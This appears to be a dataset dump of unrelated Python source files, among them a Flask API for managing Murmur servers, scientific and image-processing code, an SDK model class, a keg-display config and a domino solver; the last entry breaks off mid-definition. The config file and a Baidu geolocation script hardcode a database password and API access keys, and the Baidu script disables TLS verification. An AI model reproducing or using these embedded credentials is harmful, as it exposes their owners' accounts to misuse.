text stringlengths 38 1.54M |
|---|
N = int(input())
A = list(map(int, input().split()))
c1 = {}
c2 = {}
for i in range(N):
c1.setdefault(i + A[i], 0)
c1[i + A[i]] += 1
c2.setdefault(i - A[i], 0)
c2[i - A[i]] += 1
result = 0
for k in set(c1).intersection(c2):
result += c1[k] * c2[k]
print(result)
|
import numpy as np
import scipy.io as io
params = ['Lgrad','vc','h','m','rou']
for k in range(5):
theta_param = io.loadmat(params[k] +'_data.mat')
theta = theta_param[params[k]]
print(theta)
matpath1 = params[k] + '_data_c.mat'
for j in range(4):
theta[j+1,1] = np.abs(theta[j+1,0] - theta[0,0])/theta[0, 0]*100
theta[j + 1, 4] = (theta[j+1,3] - theta[j+1,2])/(theta[0,3] - theta[0,2])*100
io.savemat(matpath1,{params[k]+'_c':theta})
print(theta)
|
"""
api.py
All API route endpoints
:copyright: (C) 2014 by github.com/alfg.
:license: MIT, see README for more details.
"""
from datetime import timedelta
from flask import request, jsonify, json, Response
from flask.ext.classy import FlaskView, route
from app import app, meta, auth, auth_enabled, adapter
from app.utils import obj_to_dict, get_server_conf, get_server_port, get_all_users_count, conditional
from app.callbacks import ServerCallback, ServerAuthenticator, MetaCallback
import Murmur
class ServersView(FlaskView):
"""
Primary interface for creating, reading and writing to mumble servers.
"""
@conditional(auth.login_required, auth_enabled)
def index(self):
"""
Lists all servers
"""
servers = []
for s in meta.getAllServers():
servers.append({
'id': s.id(),
'name': get_server_conf(meta, s, 'registername'),
'address': '%s:%s' % (
get_server_conf(meta, s, 'host'),
get_server_port(meta, s),
),
'host': get_server_conf(meta, s, 'host'),
'port': get_server_port(meta, s),
'running': s.isRunning(),
'users': (s.isRunning() and len(s.getUsers())) or 0,
'maxusers': get_server_conf(meta, s, 'users') or 0,
'channels': (s.isRunning() and len(s.getChannels())) or 0,
'uptime_seconds': s.getUptime() if s.isRunning() else 0,
'uptime': str(
timedelta(seconds=s.getUptime()) if s.isRunning() else ''
),
'log_length': s.getLogLen()
})
# Workaround response due to jsonify() not allowing top-level json response
# https://github.com/mitsuhiko/flask/issues/170
return Response(json.dumps(servers, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
def get(self, id):
"""
Lists server details
"""
id = long(id)
s = meta.getServer(id)
# Return 404 if not found
if s is None:
return jsonify(message="Not Found"), 404
tree = obj_to_dict(s.getTree()) if s.isRunning() else None
json_data = {
'id': s.id(),
'name': get_server_conf(meta, s, 'registername'),
'host': get_server_conf(meta, s, 'host'),
'port': get_server_port(meta, s),
'address': '%s:%s' % (
get_server_conf(meta, s, 'host'),
get_server_port(meta, s),
),
'password': get_server_conf(meta, s, 'password'),
'welcometext': get_server_conf(meta, s, 'welcometext'),
'user_count': (s.isRunning() and len(s.getUsers())) or 0,
'maxusers': get_server_conf(meta, s, 'users') or 0,
'running': s.isRunning(),
'uptime': s.getUptime() if s.isRunning() else 0,
'humanize_uptime': str(
timedelta(seconds=s.getUptime()) if s.isRunning() else ''
),
'parent_channel': tree['c'] if s.isRunning() else None,
'sub_channels': tree['children'] if s.isRunning() else None,
'users': tree['users'] if s.isRunning() else None,
'registered_users': s.getRegisteredUsers('') if s.isRunning() else None,
'log_length': s.getLogLen(),
'bans': s.getBans() if s.isRunning() else 0
}
return jsonify(json_data)
@conditional(auth.login_required, auth_enabled)
def post(self):
"""
Creates a server, starts server, and returns id
"""
# Basic Configuration
password = request.form.get('password')
port = request.form.get('port') # Defaults to inifile+server_id-1
timeout = request.form.get('timeout')
bandwidth = request.form.get('bandwidth')
users = request.form.get('users')
welcometext = request.form.get('welcometext')
# Data for registration in the public server list
registername = request.form.get('registername')
registerpassword = request.form.get('registerpassword')
registerhostname = request.form.get('registerhostname')
registerurl = request.form.get('registerurl')
# Create server
server = meta.newServer()
# Set conf if provided
server.setConf('password', password) if password else None
server.setConf('port', port) if port else None
server.setConf('timeout', timeout) if timeout else None
server.setConf('bandwidth', bandwidth) if bandwidth else None
server.setConf('users', users) if users else None
server.setConf('welcometext', welcometext) if welcometext else None
server.setConf('registername', registername) if registername else None
# Start server
server.start()
# Format to JSON
json_data = {
'id': server.id()
}
return jsonify(json_data)
@conditional(auth.login_required, auth_enabled)
def delete(self, id):
"""
Shuts down and deletes a server
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
# Stop server first if it is running
if server.isRunning():
server.stop()
# Delete server instance
server.delete()
return jsonify(message="Server deleted")
##
# Nested routes and actions
##
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/start', methods=['POST'])
def start(self, id):
""" Starts server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
# Message if server is already running
if server.isRunning():
return jsonify(message="Server already running.")
# Start server instance
server.start()
return jsonify(message="Server started.")
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/stop', methods=['POST'])
def stop(self, id):
""" Stops server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
# Stop server first if it is running
if not server.isRunning():
return jsonify(message="Server already stopped.")
# Stop server instance
server.stop()
return jsonify(message="Server stopped.")
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/logs', methods=['GET'])
def logs(self, id):
""" Gets all server logs by server ID
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
logs = []
for l in server.getLog(0, -1):
logs.append({
"message": l.txt,
"timestamp": l.timestamp,
})
return Response(json.dumps(logs, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/user/<user>', methods=['DELETE'])
def user_del_user(self, id, user):
""" Deletes user
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="No Server Found for ID "+str(id)), 500
olduser = server.getRegistration(int(user))
if olduser is None:
return jsonify(message="No User Found for ID "+str(user)), 500
server.unregisterUser(int(user))
json_data = {
"user_id": user,
"deleted": 'Success'
}
return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/user', methods=['POST'])
def user_new_user(self, id):
""" Creates user
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
username = request.form.get('username')
password = request.form.get('password')
new_user = {
Murmur.UserInfo.UserName: username,
Murmur.UserInfo.UserPassword: password
}
added = server.registerUser(new_user)
data = obj_to_dict(server.getRegistration(added))
json_data = {
"user_id": added,
"username": data['UserName'],
"last_active": data['UserLastActive']
}
return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/user/<user>', methods=['GET'])
def register_user(self, id, user):
""" Gets registered user by ID
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getRegistration(int(user)))
json_data = {
"user_id": user,
"username": data['UserName'],
"last_active": data['UserLastActive']
}
return Response(json.dumps(json_data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/channels', methods=['GET'])
def channels(self, id):
""" Gets all channels in server
"""
server = meta.getServer(int(id))
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getChannels())
return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/channels/<channel_id>', methods=['GET'])
def channel(self, id, channel_id):
""" Gets all channels in server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getChannelState(channel_id))
return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<id>/bans', methods=['GET'])
def bans(self, id):
""" Gets all banned IPs in server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getBans())
return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/conf', methods=['GET'])
def conf(self, id):
""" Gets all configuration in server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getAllConf())
return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/conf', methods=['POST'])
def set_conf(self, id):
""" Sends a message to all channels in a server
"""
key = request.form.get('key')
value = request.form.get('value')
if key and value:
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
server.setConf(key, value)
return jsonify(message="Configuration updated.")
else:
return jsonify(message="Configuration key and value required.")
@conditional(auth.login_required, auth_enabled)
@route('<id>/channels/<channel_id>/acl', methods=['GET'])
def channel_acl(self, id, channel_id):
""" Gets all channel ACLs in server
"""
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
data = obj_to_dict(server.getACL(channel_id))
return Response(json.dumps(data, sort_keys=True, indent=4), mimetype='application/json')
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/sendmessage', methods=['POST'])
def send_message(self, id):
""" Sends a message to all channels in a server
"""
message = request.form.get('message')
if message:
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
server.sendMessageChannel(0, True, message)
return jsonify(message="Message sent.")
else:
return jsonify(message="Message required.")
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/setsuperuserpw', methods=['POST'])
def set_superuser_pw(self, id):
""" Sets SuperUser password for server id
"""
password = request.form.get('password')
if password:
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
server.setSuperuserPassword(password)
return jsonify(message="Superuser password set.")
else:
return jsonify(message="Password required.")
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/kickuser', methods=['POST'])
def kick_user(self, id):
""" Kicks user from server.
"""
user_session = int(request.form.get("usersession")) # Session ID of user
reason = request.form.get("reason", "Reason not defined.") # Reason messaged for being kicked.
if user_session:
server = meta.getServer(id)
# Return 404 if not found
if server is None:
return jsonify(message="Not Found"), 404
try:
server.kickUser(user_session, reason)
return jsonify(message="User kicked from server.")
except Murmur.InvalidSessionException:
return jsonify(message="Not a valid session ID.")
else:
return jsonify(message="User session required.")
@conditional(auth.login_required, auth_enabled)
@route('<int:id>/authenticator', methods=['GET'])
def authenticator (self, id):
"""Some testing
"""
s = meta.getServer(int(id))
#serverprx = Murmur.ServerCallbackPrx.uncheckedCast(adapter.addWithUUID(ServerCallback(s)))
#s.addCallback(serverprx)
s.setAuthenticator(Murmur.ServerAuthenticatorPrx.uncheckedCast(adapter.addWithUUID(ServerAuthenticator(int(id)))))
return jsonify(message="Callback attached for: "+str(id))
class StatsView(FlaskView):
"""
View for gathering stats on murmur statistics.
"""
@conditional(auth.login_required, auth_enabled)
def index(self):
"""
Lists all stats
"""
stats = {
'all_servers': len(meta.getAllServers()),
'booted_servers': len(meta.getBootedServers()),
'users_online': get_all_users_count(meta),
'murmur_version': meta.getVersion()[3],
'murmur-rest_version': '0.1',
'uptime': meta.getUptime()
}
# Workaround response due to jsonify() not allowing top-level json response
# https://github.com/mitsuhiko/flask/issues/170
return Response(json.dumps(stats, sort_keys=True, indent=4), mimetype='application/json')
# Register views
ServersView.register(app)
StatsView.register(app)
if __name__ == '__main__':
app.run(debug=True)
|
# Copyright (C) 2010-2016 Dzhelil S. Rufat. All Rights Reserved.
"""
>>> from spexy.grid import Grid_1D
>>> from spexy.grid.grid import hodge_star_matrix
>>> g = Grid_1D.chebnew(3)
>>> H0, H1, H0d, H1d = hodge_star_matrix(g)
>>> H0
array([[ 0.808, 0.058],
[ 0.058, 0.808]])
>>> H1d
array([[ 1.244, -0.089],
[-0.089, 1.244]])
>>> H0d
array([[ 0.411, 0.111, -0.022],
[ 0.056, 0.889, 0.056],
[-0.022, 0.111, 0.411]])
>>> H1
array([[ 2.488, -0.333, 0.179],
[-0.167, 1.167, -0.167],
[ 0.179, -0.333, 2.488]])
>>> g = Grid_1D.chebnew(8)
>>> H0, H1, H0d, H1d = hodge_star_matrix(g)
>>> H0
array([[ 0.134, 0.019, -0.005, 0.002, -0.001, 0. , -0. ],
[ 0.01 , 0.243, 0.026, -0.006, 0.002, -0.001, 0. ],
[-0.002, 0.02 , 0.317, 0.029, -0.005, 0.002, -0. ],
[ 0.001, -0.004, 0.027, 0.343, 0.027, -0.004, 0.001],
[-0. , 0.002, -0.005, 0.029, 0.317, 0.02 , -0.002],
[ 0. , -0.001, 0.002, -0.006, 0.026, 0.243, 0.01 ],
[-0. , 0. , -0.001, 0.002, -0.005, 0.019, 0.134]])
The matrix is a Centrosymmetric matrix
"""
from spexy.ops import nat, num
xmin, xmax = -1, +1
imp = nat
diff = imp.diff()
even = imp.slice_(0, None, 2)
odd = imp.slice_(1, None, 2)
evenodd = lambda f: even(f) + odd(f)
mid = imp.slice_(1, -1, None)
def D0(f):
return diff(num.A00(f))
def D1(f):
return 0
def D0d(f):
return diff(f)
def D1d(f):
return 0
def H0d(f):
"""
>>> num.mat(H0d, 3)
array([[ 0.411, 0.111, -0.022],
[ 0.056, 0.889, 0.056],
[-0.022, 0.111, 0.411]])
"""
f = num.Wd(f)
f = num.mirror(1, -1)(f)
f = imp.H(f)
f = num.unmirror(1)(f)
return f
def H1(f):
"""
>>> num.mat(H1, 3)
array([[ 2.488, -0.333, 0.179],
[-0.167, 1.167, -0.167],
[ 0.179, -0.333, 2.488]])
"""
f = num.mirror(1, -1)(f)
f = imp.Hinv(f)
f = num.unmirror(1)(f)
f = num.Wdinv(f)
return f
def H0(f):
"""
>>> num.mat(H0, 2)
array([[ 0.808, 0.058],
[ 0.058, 0.808]])
"""
f = num.A00(f)
f = num.W(f)
f = num.mirror(0, -1)(f)
f = imp.H(f)
f = num.unmirror(0)(f)
f = mid(f)
return f
def H1d(f):
"""
>>> num.mat(H1d, 2)
array([[ 1.244, -0.089],
[-0.089, 1.244]])
"""
f = num.A00(f)
f = num.mirror(0, -1)(f)
f = imp.Hinv(f)
f = num.unmirror(0)(f)
f = num.Winv(f)
f = mid(f)
return f
def S(f):
"""
>>> num.mat(S, 1)
array([[ 1.],
[ 1.]])
>>> num.mat(S, 2)
array([[ 1.366, -0.366],
[ 0.5 , 0.5 ],
[-0.366, 1.366]])
"""
f = num.Abb(f)
f = num.mirror(0, +1)(f)
f = imp.S(f)
f = num.unmirror(1)(f)
return f
def Sinv(f):
"""
Interpolate from primal to dual vertices.
>>> from spexy.grid import Grid_1D
>>> from spexy.grid.grid import switch_matrix
>>> switch_matrix(Grid_1D.chebnew(2))[0]
array([[ 1.],
[ 1.]])
>>> num.mat(Sinv, 2)
array([[ 0.5, 0.5]])
>>> switch_matrix(Grid_1D.chebnew(3))[0]
array([[ 1.366, -0.366],
[ 0.5 , 0.5 ],
[-0.366, 1.366]])
>>> num.mat(Sinv, 3)
array([[ 0.455, 0.667, -0.122],
[-0.122, 0.667, 0.455]])
"""
f = num.mirror(1, +1)(f)
f = imp.Sinv(f)
f = num.unmirror(0)(f)
f = mid(f)
return f
def Pup0(f):
return imp.weave(S(f), f)
def Pup0d(f):
return imp.weave(f, Sinv(f))
def Pup1(f):
return Pup0d(H1(f))
def Pup1d(f):
return Pup0(H1d(f))
def Q(f):
"""
>>> num.mat(Q, 1)
array([[ 1.],
[ 1.]])
>>> num.mat(Q, 2)
array([[ 0.625, -0.125],
[ 0.5 , 0.5 ],
[-0.125, 0.625]])
"""
# f = addbndry(f)
# f = chebyshev.Q(f)
# return f
f = num.A00(f)
f = num.W(f)
f = num.mirror(0, -1)(f)
f = imp.Q(f)
f = num.unmirror(1)(f)
return f
def Qinv(f):
"""
>>> num.mat(Qinv, 2)
array([[ 0.5, 0.5]])
>>> num.mat(Qinv, 3)
array([[ 1. , 0.667, -0.333],
[-0.333, 0.667, 1. ]])
"""
# f = chebyshev.Qinv(f)
# f = f[1:-1]
# return f
f = num.mirror(1, -1)(f)
f = imp.Qinv(f)
f = num.unmirror(0)(f)
f = num.Winv(f)
f = mid(f)
return f
def Pdown0(f):
return odd(f)
def Pdown0d(f):
return even(f)
def Pdown1(f):
return evenodd(Q(f))
def Pdown1d(f):
return evenodd(mid(Q(f)))
def G0(f):
"""
>>> num.mat(G0, 3)
array([[-2.121, 2.828, -0.707],
[-0.707, -0. , 0.707],
[ 0.707, -2.828, 2.121]])
"""
f = num.Abb(f)
f = num.mirror(0, +1)(f)
f = num.G(f)
f = num.unmirror(0)(f)
f = num.Winv(f)
f = mid(f)
return f
def G0d(f):
"""
>>> num.mat(G0d, 2)
array([[-0.707, 0.707],
[-0.707, 0.707]])
"""
f = num.mirror(1, +1)(f)
f = num.G(f)
f = num.unmirror(1)(f)
f = num.Wdinv(f)
return f
derivative = (
(D0, D1),
(D0d, D1d),
)
hodge_star = (
(H0, H1),
(H0d, H1d),
)
upsample = (
(Pup0, Pup1),
(Pup0d, Pup1d),
)
downsample = (
(Pdown0, Pdown1),
(Pdown0d, Pdown1d),
)
gradient = (
(G0, None),
(G0d, None),
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayCommerceTransportCarbonDataQueryModel(object):
def __init__(self):
self._biz_date_end = None
self._biz_date_start = None
self._biz_scene = None
self._city_code = None
self._open_id = None
self._user_id = None
@property
def biz_date_end(self):
return self._biz_date_end
@biz_date_end.setter
def biz_date_end(self, value):
self._biz_date_end = value
@property
def biz_date_start(self):
return self._biz_date_start
@biz_date_start.setter
def biz_date_start(self, value):
self._biz_date_start = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def city_code(self):
return self._city_code
@city_code.setter
def city_code(self, value):
self._city_code = value
@property
def open_id(self):
return self._open_id
@open_id.setter
def open_id(self, value):
self._open_id = value
@property
def user_id(self):
return self._user_id
@user_id.setter
def user_id(self, value):
self._user_id = value
def to_alipay_dict(self):
params = dict()
if self.biz_date_end:
if hasattr(self.biz_date_end, 'to_alipay_dict'):
params['biz_date_end'] = self.biz_date_end.to_alipay_dict()
else:
params['biz_date_end'] = self.biz_date_end
if self.biz_date_start:
if hasattr(self.biz_date_start, 'to_alipay_dict'):
params['biz_date_start'] = self.biz_date_start.to_alipay_dict()
else:
params['biz_date_start'] = self.biz_date_start
if self.biz_scene:
if hasattr(self.biz_scene, 'to_alipay_dict'):
params['biz_scene'] = self.biz_scene.to_alipay_dict()
else:
params['biz_scene'] = self.biz_scene
if self.city_code:
if hasattr(self.city_code, 'to_alipay_dict'):
params['city_code'] = self.city_code.to_alipay_dict()
else:
params['city_code'] = self.city_code
if self.open_id:
if hasattr(self.open_id, 'to_alipay_dict'):
params['open_id'] = self.open_id.to_alipay_dict()
else:
params['open_id'] = self.open_id
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayCommerceTransportCarbonDataQueryModel()
if 'biz_date_end' in d:
o.biz_date_end = d['biz_date_end']
if 'biz_date_start' in d:
o.biz_date_start = d['biz_date_start']
if 'biz_scene' in d:
o.biz_scene = d['biz_scene']
if 'city_code' in d:
o.city_code = d['city_code']
if 'open_id' in d:
o.open_id = d['open_id']
if 'user_id' in d:
o.user_id = d['user_id']
return o
|
import logging
# Messages
STARTUP_MSG = u"pydKeg\nStarting"
STARTUP_LOGMSG = u"pydKeg Starting"
# Display Parameters
DISPLAY_DRIVER='winstar_weg'
DISPLAY_WIDTH = 100 # the width of the display
DISPLAY_HEIGHT = 16 # the height of the display
DISPLAY_SIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)
#DISPLAY_WIDTH = 20 # the character width of the display
#DISPLAY_HEIGHT = 4 # the number of lines on the display
DISPLAY_PIN_RS = 8
DISPLAY_PIN_E = 7
DISPLAY_PINS_DATA = [ 12, 16, 20, 21 ] # Raspdac V2
# DB Server Parameters
SERVER='pydKeg-tap1.local'
PASSWORD='beertime'
PORT=3306
# Tap Number
TAP=1
# Page Parameters
SCROLL_BLANK_WIDTH = 10 # Number of spaces to insert into string that is scrolling
COOLING_PERIOD = 15 # Default amount of time in seconds before an alert message can be redisplayed
HESITATION_TIME = 2.5 # Amount of time in seconds to hesistate before scrolling
ANIMATION_SMOOTHING = .01 # Amount of time in seconds before repainting display
# System Parameters
# This is where the log file will be written
LOGFILE=u'/var/log/pydKeg.log'
#LOGFILE=u'./log/pydKeg.log'
STATUSLOGFILE=u'/var/log/pydKeg-status.log'
#STATUSLOGFILE=u'./log/pydKeg-Status.log'
STATUSLOGGING = False
# Logging level
LOGLEVEL=logging.DEBUG
#LOGLEVEL=logging.INFO
#LOGLEVEL=logging.WARNING
#LOGLEVEL=logging.CRITICAL
# Localization Parameters
# Adjust this setting to localize the time display to your region
TIMEZONE=u"US/Eastern"
TIME24HOUR=False
#TIMEZONE=u"Europe/Paris"
# Adjust this setting to localize temperature displays
TEMPERATURE=u'fahrenheit'
#TEMPERATURE=u'celsius'
# WEATHER Parameters
# You must get your own API key from http://openweathermap.org/appid
OWM_API = u'52dfe63ba1fd89b1eda781a02d456842'
# NOVA Metro area. Replace with your location.
OWM_LAT = 38.86
OWM_LON = -77.34
# NY Metro area. Replace with your location.
#OWM_LAT = 40.72
#OWM_LON = -74.07
|
import requests
import json
def login(account):
url='https://api.map.baidu.com/location/ip'
form_data={
"ip": account["ip"],
"ak": account["ak"],
"coor":account["coor"]
}
# form_data = {"ip": "101.247.112.18", "ak": 'dntnIGs3ueWbi8TGkGYz0l8j1p6c9Yc1', "coor": "bd09ll"}
print(form_data)
headers={
'User-Agent': "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
}
response=requests.post(url=url,headers=headers,data=form_data,verify=False);
return response.text.encode('utf-8').decode('unicode_escape')
account=dict()
account['ip']=''
account['ak']='dntnIGs3ueWbi8TGkGYz0l8j1p6c9Yc1'
account['coor']='bd09ll'
t=login(account)
print(t)
#{"status":0,"data":{"user_id":4,"token":"8727cb46-81dc-4719-b043-bb76532171fc"}}
|
# Generated by Django 2.1.4 on 2018-12-28 19:27
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('meals', '0002_remove_meals_preperation_time'),
]
operations = [
migrations.AddField(
model_name='meals',
name='preperation_time',
field=models.IntegerField(default=20),
preserve_default=False,
),
]
|
# -*- coding: utf-8 -*-
# Copyright (C) 2008 Murphy Lab
# Carnegie Mellon University
#
# Written by Luis Pedro Coelho <lpc@cmu.edu>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation; either version 2 of the License,
# or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
#
# For additional information visit http://murphylab.web.cmu.edu or
# send email to murphy@cmu.edu
from __future__ import division
import numpy
from scipy import ndimage
from mahotas.morph import majority_filter
from .thresholding import otsu, rc, murphy_rc
def nonzeromin(img):
'''
Returns the minimum non zero element in img.
'''
A = A.copy().ravel()
A.sort()
if A[-1] == 0: return 0
pos = np.searchsorted(A, 1)
return A[pos]
def mean_filter(img,size=3):
'''
meanimg = mean_filter(img, size=3)
computes
meanimg[i,j] = img[i-size//2:i+size//2+1,j-size//2:j+size//2+1].mean()
i.e., meanimg[i,j] is the mean of the squared centred around (i,j)
'''
if len(img.shape) == 2:
mask=numpy.ones((size,size))/size/size
elif len(img.shape) == 3:
mask=numpy.ones((size,size,size))/size/size/size
else:
raise ValueError,'mean_filter: img is of wrong shape (can only handle 2d & 3d)'
return ndimage.convolve(img,mask)
def localthresholding(img,method='mean',size=8):
'''
thresholded = localthresholding(img,method='mean',size=8)
@param method: One of
'mean': compute the mean pixel value
'median': compute the median pixel value
@param size size of the window to use
'''
if method == 'mean':
func=mean_filter
elif method == 'median':
func=ndimage.median_filter
else:
raise ArgumentErrorType,"localthresholding: unknown method '%s'" % method
return img > func(img,size)
def localglobal(img,ignore_zeros=True,globalmethod='otsu',localmethod='mean',localsize=8):
'''
Perform both local and global thresholding.
result[i,j] = (img[i,j] > global_threshold) * (img[i,j] > local_threshold[i,j])
@param img: The image
@param ignore_zeros: Whether to ignore zero-valued pixels
@param globalmethod: Global method to use ('otsu', 'rc', or 'murphy_rc')
@param localmethod: Which local method to use (@see localthresholding)
@param localsize: Size parameter for local thresholding (@see localthresholding)
'''
localobjects=localthresholding(img,method=localmethod,size=localsize)
if globalmethod == 'otsu':
T=otsu(img,ignore_zeros=ignore_zeros)
elif globalmethod == 'rc':
T=rc(img,ignore_zeros=ignore_zeros)
elif globalmethod == 'murphy_rc':
T=murphy_rc(img,ignore_zeros=ignore_zeros)
else:
raise ValueError,"localglobal: globalmethod '%s' not recognised." % globalmethod
globalobjects=img > T
return localobjects * globalobjects
def multithreshold(img,ignore_zeros=True,firstThreshold=20,nrThresholds=5):
'''
labeled,N = multithreshold(img, ignore_zeros = True)
Performs multi thresholding (which is a form of oversegmentation).
labeled is of the same size and type as img and contains different labels for
the N detected objects (the return of this function is similar to that of scipy.ndimage.label())
@param img: The input image
@param ignore_zeros: Don't take zero pixels into account
'''
output=numpy.zeros_like(img)
if ignore_zeros:
pmin=nonzeromin(img)
else:
pmin=img.min()
thresholds=pmin+firstThreshold+(img.max()-pmin-firstThreshold)//nrThresholds*numpy.arange(nrThresholds)
Ts=[majority_filter(img>T) for T in thresholds]
obj_count = 0
Ts.append(Ts[0]*0)
labeled0,N0=ndimage.label(Ts[0])
for T1 in Ts[1:]:
labeled1,N1=ndimage.label(T1)
for obj in xrange(N0):
binimg=(labeled0 == (obj+1))
objects1=(labeled1*binimg)
if not objects1.any() or ndimage.label(objects1)[1] == 1:
obj_count += 1
output[binimg]=obj_count
labeled0=labeled1
N0=N1
return output,obj_count
# vim: set ts=4 sts=4 sw=4 expandtab smartindent:
|
import os
for i in range(0, 5000):
print(str(i).zfill(4))
os.system("diff saidas/t"+str(i).zfill(4)+" minhas_saidas/r"+str(i).zfill(4)+" > diff/diff"+str(i).zfill(4))
os.system("find ./diff -empty -delete")
|
#!/usr/bin/python2
import sys
from dictcc import Dict
from dictcc import Result
if len(sys.argv) != 4:
print("Argument count is wrong")
sys.exit()
from_lang = sys.argv[1]
to_lang = sys.argv[2]
search = sys.argv[3]
r = Dict.translate(word=search, from_language=from_lang, to_language=to_lang)
if r.n_results < 1:
print("No match found")
for tin, tout in r.translation_tuples:
print(("en: " + tin)).encode('utf-8')
print(("de: " + tout)).encode('utf-8')
|
from Helpers.misc import swap, verify
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Algoritmo de resolucion de tablero domino haciendo uso de la fuerza bruta
#
# @param pBoard = Matriz sobre el cual se ejecutara el algoritmo para la busqueda de
# soluciones
# @param pTiles = Lista de fichas que sera utilizada para verificaciones
# @param pSolution = Posible solucion a verificar
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def brute_force(pBoard, pTiles, pSolution):
# @var tile_holder = variable para guardar las fichas a buscar
tile_holder = []
# Si ya no hay fichas ni pasos en la solucion significa que todas fueron asignadas
# Pero si quedan fichas y ya no hay pasos significa que no fue una solucion valida
if pTiles == [] and pSolution == []:
return True
elif(pTiles!=[] and pSolution == []):
return False
else:
# Se usan 2 for para recorrer la matriz de izquierda a derecha, de arriba a abajo
for i in range(len(pBoard)):
for j in range(len(pBoard[i])):
# Se pregunta si lo que se esta leyendo en la matriz es un entero
if(isinstance(pBoard[i][j], int)):
# Si la posicion 0 de la solucion es un 0, esto significa que se va a leer una ficha de forma Horizontal
if(pSolution[0] == 0):
try:
#Se agrega la coordenada leida y la derecha inmediata a tile_holder
tile_holder.append(pBoard[i][j])
tile_holder.append(pBoard[i][j+1])
# Las coordenadas leidas se convierten en string para marcar que ya se leyeron
pBoard[i][j] = str(pBoard[i][j])
pBoard[i][j+1] = str(pBoard[i][j+1])
#Si existe un error de indice esto significa que la solucion no es valida
except IndexError:
return False
# Si la posicion 0 de la solucion es un 1, esto significa que se va a leer una ficha de forma Vertical
elif(pSolution[0] == 1):
try:
#Se agrega la coordenada leida y la de abajo inmediata a tile_holder
tile_holder.append(pBoard[i][j])
tile_holder.append(pBoard[i+1][j])
# Las coordenadas leidas se convierten en string para marcar que ya se leyeron
pBoard[i][j] = str(pBoard[i][j])
pBoard[i+1][j] = str(pBoard[i+1][j])
#Si existe un error de indice esto significa que la solucion no es valida
except IndexError:
return False
# Se verifica si la pieza de tile_holder existe en la lista de piezas
if(verify(tile_holder, pTiles)):
# Se hace el intento de remover la pieza de la lista donde se busca, si falla se le da la vuelta y se vuelve a intentar
try:
pTiles.remove(tile_holder)
except:
swap(tile_holder)
pTiles.remove(tile_holder)
# Se hace la llamada recursiva eliminando el paso actual de la solucion
return brute_force(pBoard, pTiles, pSolution[1:])
#Si no existe en la lista se asume que ya se coloco por lo tanto la solucion no es valida
else:
return False |
def func(int):
